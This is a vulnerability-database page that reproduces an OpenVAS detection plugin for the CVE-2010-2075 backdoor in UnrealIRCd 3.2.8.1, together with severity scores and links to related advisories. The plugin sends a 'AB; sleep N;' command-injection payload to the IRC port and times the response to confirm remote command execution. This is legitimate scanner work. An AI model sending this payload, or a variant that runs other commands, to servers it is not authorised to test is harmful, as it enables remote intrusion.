Lucene search
Copyright (C) 2010 Vlatko KosturjakOPENVAS:136141256231080111HistoryJun 13, 2010 - 12:00 a.m.
UnrealIRCd Backdoor
2010-06-1300:00:00
Copyright (C) 2010 Vlatko Kosturjak
plugins.openvas.org
58
6.5 Medium
AI Score
Confidence
Low
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.65 Medium
EPSS
Percentile
97.9%
Detection of backdoor in UnrealIRCd.
# SPDX-FileCopyrightText: 2010 Vlatko Kosturjak
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-or-later
CPE = "cpe:/a:unrealircd:unrealircd";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.80111");
script_version("2023-08-01T13:29:10+0000");
script_tag(name:"last_modification", value:"2023-08-01 13:29:10 +0000 (Tue, 01 Aug 2023)");
script_tag(name:"creation_date", value:"2010-06-13 17:55:39 +0200 (Sun, 13 Jun 2010)");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_cve_id("CVE-2010-2075");
script_name("UnrealIRCd Backdoor");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2010 Vlatko Kosturjak");
script_family("Gain a shell remotely");
script_dependencies("gb_unrealircd_detect.nasl");
script_require_ports("Services/irc", 6667);
script_mandatory_keys("UnrealIRCD/Detected"); # TBD: Only ircd/detected?
script_xref(name:"URL", value:"http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt");
script_xref(name:"URL", value:"http://seclists.org/fulldisclosure/2010/Jun/277");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/40820");
script_tag(name:"summary", value:"Detection of backdoor in UnrealIRCd.");
script_tag(name:"insight", value:"Remote attackers can exploit this issue to execute arbitrary
system commands within the context of the affected application.");
script_tag(name:"affected", value:"The issue affects Unreal 3.2.8.1 for Linux. Reportedly package
Unreal3.2.8.1.tar.gz downloaded in November 2009 and later is affected. The MD5 sum of the
affected file is 752e46f2d873c1679fa99de3f52a274d. Files with MD5 sum of
7b741e94e867c0a7370553fd01506c66 are not affected.");
script_tag(name:"solution", value:"Install latest version of unrealircd and check signatures of
software you're installing.");
script_tag(name:"qod_type", value:"remote_analysis");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("host_details.inc");
if( ! port = get_app_port( cpe:CPE ) ) exit( 0 );
sock = open_sock_tcp( port );
if( ! sock ) exit( 0 );
line = recv( socket:sock, length:16384 ); # clear buffer
foreach i( make_list(3, 5, 10) ) {
reqstr = string( "AB; sleep ", i, ";\n" );
send( socket:sock, data:reqstr );
start = unixtime();
line = recv_line( socket:sock, length:4096 );
stop = unixtime();
if( stop - start < i || stop - start > ( i + 5 ) ) exit( 0 );
}
close( sock );
security_message( port:port );
exit( 0 );
Related
prion
prion
Command injection
2010-06-15 14:04:00
nessus
nessus
UnrealIRCd Backdoor Detection
2010-06-14 00:00:00
GLSA-201006-21 : UnrealIRCd: Multiple vulnerabilities
2010-06-15 00:00:00
cve
cve
CVE-2010-2075
2010-06-15 14:04:00
openvas
openvas
Gentoo Security Advisory GLSA 201006-21 (unrealircd)
2011-03-09 00:00:00
Gentoo Security Advisory GLSA 201006-21 (unrealircd)
2011-03-09 00:00:00
gentoo
gentoo
UnrealIRCd: Multiple vulnerabilities
2010-06-14 00:00:00
avleonov
avleonov
Vulnerability Management at Tinkoff Fintech School
2019-03-04 10:38:31
6.5 Medium
AI Score
Confidence
Low
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.65 Medium
EPSS
Percentile
97.9%
Related for OPENVAS:136141256231080111